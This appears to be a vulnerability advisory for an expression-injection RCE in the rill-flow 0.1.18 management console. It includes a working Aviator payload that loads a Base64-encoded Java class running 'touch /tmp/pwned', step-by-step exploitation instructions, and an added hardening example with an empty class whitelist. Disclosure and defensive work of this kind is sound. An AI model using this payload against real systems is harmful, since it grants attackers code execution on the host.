| Title | weibocom rill-flow rill-flow-0.1.18 Code Injection |
|---|---|

### Description

Reference: https://github.com/weibocom/rill-flow/issues/102
In the Rill-Flow management console, an attacker can create a flow (process list) and set node input mappings that are evaluated as Aviator expressions, which leads to remote code execution (RCE). This allows the attacker to escalate from a web user of the console to the privileges of the host machine.
Rill-Flow payload (JDK 17):
```
use org.springframework.cglib.core.*;use org.springframework.util.*;use java.security.*;ReflectUtils.defineClass('org.springframework.expression.Test', Base64Utils.decodeFromString('yv66vgAAADQALAoACgAUCQAVABYIABcKABgAGQoAGgAbCAAcCgAaAB0HAB4HAB8HACABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAeAQAKU291cmNlRmlsZQEACVRlc3QuamF2YQwACwAMBwAhDAAiACMBAAtzdGF0aWMgRXhlYwcAJAwAJQAmBwAnDAAoACkBABB0b3VjaCAvdG1wL3B3bmVkDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAjb3JnL3NwcmluZ2ZyYW1ld29yay9leHByZXNzaW9uL1Rlc3QBABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAkACgAAAAAAAgABAAsADAABAA0AAAAhAAEAAQAAAAUqtwABsQAAAAEADgAAAAoAAgAAAAQABAAFAAgADwAMAAEADQAAAFMAAgABAAAAFrIAAhIDtgAEuAAFEga2AAdXpwAES7EAAQAAABEAFAAIAAIADgAAABYABQAAAAkACAAKABEADAAUAAsAFQAOABAAAAAHAAJUBwARAAABABIAAAACABM'), ClassLoader.getSystemClassLoader(), nil, Class.forName('org.springframework.expression.ExpressionParser'));
```
### Impact
Rillflow *
### Proof of Concept
1. Create a process list and click Create.
2. Import the demo file:
```yaml
version: 1.0.0
workspace: rillFlowSimple
dagName: greet
alias: release
type: flow
inputSchema: >-
  [{"required":true,"name":"Bob","type":"String"},{"required":true,"name":"Alice","type":"String"}]
tasks:
  - category: function
    name: Bob
    resourceName: http://sample-executor:8000/greet.json?user=Bob
    pattern: task_sync
    tolerance: false
    next: Alice
    inputMappings:
      - source: "$.context.Bob"
        target: "$.input.Bob"
  - category: function
    name: Alice
    resourceName: http://sample-executor:8000/greet.json?user=Alice
    pattern: task_sync
    tolerance: false
    inputMappings:
      - source: "$.context.Alice"
        target: "$.input.Alice"
```
3. Click the Bob node and enter the payload as its input:
```
use org.springframework.cglib.core.*;use org.springframework.util.*;use java.security.*;ReflectUtils.defineClass('org.springframework.expression.Test', Base64Utils.decodeFromString('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'), ClassLoader.getSystemClassLoader(), nil, Class.forName('org.springframework.expression.ExpressionParser'));
```
The victim host will then execute `touch /tmp/pwned`.
4. Click Save, then set the alias name.
5. Click Next Step, then click Submit.
6. Click Test Run, enter some arguments, and the command is executed.
### How to Fix It
When using Aviator, add the relevant configuration so that it prohibits loading external classes (see the AviatorScript documentation):
https://www.yuque.com/boyan-avfmj/aviatorscript/yr1oau
It is enough to set the class whitelist to an empty set.
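The following is an added example of that hardening, written as a standalone Java helper; it is not rill-flow's own code. It assumes AviatorScript 5.x on the classpath (`com.googlecode.aviator`). The class name `SafeAviator` and the `evalOrNull` helper are hypothetical; the `Options` and `Feature` values are the library's real ones. The empty `ALLOWED_CLASS_SET` is the whitelist the advisory recommends; removing `Feature.Use` and `Feature.NewInstance` from the feature set is an additional layer, since the payload above begins with `use` statements.

```java
import com.googlecode.aviator.AviatorEvaluator;
import com.googlecode.aviator.AviatorEvaluatorInstance;
import com.googlecode.aviator.EvalMode;
import com.googlecode.aviator.Feature;
import com.googlecode.aviator.Options;

import java.util.Collections;
import java.util.HashMap;
import java.util.Map;

/**
 * Hypothetical hardened Aviator factory (added example, not rill-flow's code).
 * An input-mapping expression only needs to read and combine values, so every
 * path from script to arbitrary JVM classes is closed off.
 */
public final class SafeAviator {

    private SafeAviator() {}

    /** Build a dedicated evaluator that permits plain data expressions only. */
    public static AviatorEvaluatorInstance newHardenedInstance() {
        // Separate instance: the process-wide AviatorEvaluator default is left untouched.
        AviatorEvaluatorInstance instance = AviatorEvaluator.newInstance(EvalMode.INTERPRETER);

        // 1. Empty class whitelist (the advisory's fix): no class may be referenced,
        //    loaded, instantiated or called statically from a script. This is what
        //    stops ReflectUtils.defineClass / Class.forName / ClassLoader access.
        instance.setOption(Options.ALLOWED_CLASS_SET, Collections.emptySet());
        instance.setOption(Options.ASSIGNABLE_ALLOWED_CLASS_SET, Collections.emptySet());

        // 2. Keep only the language features a mapping expression needs. Omitted on
        //    purpose: Feature.Use (imports), Feature.NewInstance (`new`), Feature.Module,
        //    Feature.StringInterpolation.
        instance.setOption(Options.FEATURE_SET,
                Feature.asSet(Feature.Assignment, Feature.If, Feature.Return, Feature.Lambda));

        // 3. Bound loops so a hostile mapping cannot spin the worker forever.
        instance.setOption(Options.MAX_LOOP_COUNT, 1_000);
        return instance;
    }

    /** Evaluate one mapping expression; fails closed (returns null) when Aviator rejects it. */
    public static Object evalOrNull(AviatorEvaluatorInstance instance, String expr,
                                    Map<String, Object> env) {
        try {
            return instance.execute(expr, env);
        } catch (Exception e) {
            // A disabled feature surfaces at compile time, a non-whitelisted class at
            // runtime; both are exceptions, and both are worth logging for detection.
            System.err.println("rejected expression: " + e.getClass().getSimpleName()
                    + ": " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) {
        AviatorEvaluatorInstance safe = newHardenedInstance();
        Map<String, Object> env = new HashMap<>();
        env.put("user", "Bob"); // constructed sample context

        // A legitimate mapping still evaluates.
        System.out.println(evalOrNull(safe, "'Hello, ' + user", env));

        // A `use` import, the first statement of the payload above, is now rejected
        // before evaluation because Feature.Use is not enabled.
        System.out.println(evalOrNull(safe, "use java.security.*; 1", env));

        // A static call into a JVM class is refused by the empty class whitelist.
        System.out.println(evalOrNull(safe, "ClassLoader.getSystemClassLoader()", env));
    }
}
```

Apply the hardened instance wherever the mapping expressions are compiled; a global `AviatorEvaluator.getInstance()` left at its defaults would still expose the unrestricted path. The logged rejections are also a useful detection signal: a `use` statement or a class reference inside an input mapping is not something a legitimate flow definition produces.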
| Source | https://github.com/weibocom/rill-flow/issues/102 |
|---|---|
| User | startr4ck (UID 76213) |
| Submitted | 2025-05-12 05:17 (12 months ago) |
| Moderation | 2025-05-16 21:11 (5 days later) |
| Status | Accepted |
| VulDB entry | 309408 [weibocom rill-flow 0.1.18 Management Console privilege escalation] |
| Points | 20 |